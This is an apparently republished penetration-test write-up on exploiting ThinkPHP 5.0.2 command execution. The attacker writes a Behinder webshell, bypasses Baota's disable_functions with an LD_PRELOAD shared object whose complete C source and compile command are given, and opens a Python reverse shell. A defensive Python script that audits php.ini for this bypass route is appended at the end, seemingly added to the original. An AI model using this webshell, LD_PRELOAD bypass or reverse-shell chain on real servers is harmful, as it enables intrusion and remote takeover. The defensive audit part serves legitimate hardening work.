bypass_disable_functions arising from a ThinkPHP vulnerability

2025-02-24 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

This article describes a disable_functions bypass that followed from a ThinkPHP vulnerability. The editor finds it very practical and shares it here for study.

During an authorized test, the website was found to be built with ThinkPHP 5.0.2.

ThinkPHP 5.0.2 has a command execution vulnerability.

Tried to write an Ice Scorpion (Behinder) 3.0 webshell.

The write returned an error; the & character was the problem. URL-encode the & and try again.

The connection failed.

After trying locally, the problem turned out to be the + character: once written, the + had been turned into a space. URL-encode it and write again.

The connection still failed, so I kept at it.

Besides writing the file directly, you can also start a service on a VPS and use PHP's copy function to download the webshell from the VPS straight to the target server.

With the connection working, the next step is of course whoami.

Checking disable_functions shows that the lovely Baota panel has disabled passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru.

Is there anything Baota has not disabled? What else can be done? After more digging, I studied an expert's post online:

https://www.meetsec.cn/index.php/archives/44/

Try to bypass disable_functions with LD_PRELOAD

Straight to the code:

bypass_disablefunc.php

bypass_disablefunc.c

    #define _GNU_SOURCE

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    extern char** environ;

    /* Runs automatically when the shared object is loaded. */
    __attribute__ ((__constructor__)) void preload (void)
    {
        // get command line options and arg
        const char* cmdline = getenv("EVIL_CMDLINE");

        // unset environment variable LD_PRELOAD.
        // unsetenv("LD_PRELOAD") has no effect on some
        // distributions (e.g. centos), so a crafty trick is needed.
        int i;
        for (i = 0; environ[i]; ++i) {
            if (strstr(environ[i], "LD_PRELOAD")) {
                environ[i][0] = '\0';
            }
        }

        // execute the command
        system(cmdline);
    }

Compile bypass_disablefunc.c to a shared object bypass_disablefunc_x64.so with the command gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so

Compile for the target's architecture: in an x64 environment the output is x64 by default when no option is given, and the -m32 option is required to compile for x86.

Upload it through Ice Scorpion, then test the effect:

The command executed successfully. Next, a reverse shell with nc.

nc reports that it has no -e option, so use a Python reverse shell directly:

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

The reverse shell connected successfully.

Summary: in this test, pay attention to encoding problems when writing the Ice Scorpion webshell. LD_PRELOAD was then used to bypass disable_functions.
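From the defending side, the disable_functions list quoted earlier blocks the direct command-execution functions but leaves the LD_PRELOAD route open. The audit below is an added example, not code from the original article: it parses a php.ini fragment and reports whether that route is still available. The helper names are hypothetical, the sample fragment is constructed from the list quoted above, and the set of prerequisite functions (putenv plus mail-style process spawners) is an assumption that is not exhaustive.

```python
# Added audit example; helper names are hypothetical, not from the article.

# Assumption: functions the LD_PRELOAD route usually needs (non-exhaustive).
ENV_SETTERS = {"putenv"}                       # lets PHP set LD_PRELOAD
PROCESS_SPAWNERS = {"mail", "mb_send_mail", "error_log", "imap_mail"}

# Constructed php.ini fragment using the list quoted in the article.
SAMPLE_INI = """\
; constructed sample
disable_functions = passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru
"""


def parse_disable_functions(ini_text):
    """Return the names in the last disable_functions directive, lowercased."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()    # strip ini comments
        key, sep, value = line.partition("=")
        if sep and key.strip() == "disable_functions":
            names = value.strip().strip('"').split(",")
            disabled = {n.strip().lower() for n in names if n.strip()}
    return disabled


def audit(ini_text):
    """Report which LD_PRELOAD prerequisites are still callable."""
    disabled = parse_disable_functions(ini_text)
    setters = sorted(ENV_SETTERS - disabled)
    spawners = sorted(PROCESS_SPAWNERS - disabled)
    return {
        "env_setters_enabled": setters,
        "spawners_enabled": spawners,
        # The route needs both: a way to set the variable and a new process.
        "ld_preload_route_open": bool(setters and spawners),
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_INI).items():
        print(f"{key}: {value}")
    hardened = SAMPLE_INI.rstrip("\n") + ",putenv\n"
    print("after adding putenv:", audit(hardened)["ld_preload_route_open"])
```

The effective value can differ per PHP-FPM pool or virtual host, so run the check against every configuration file that sets the directive.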
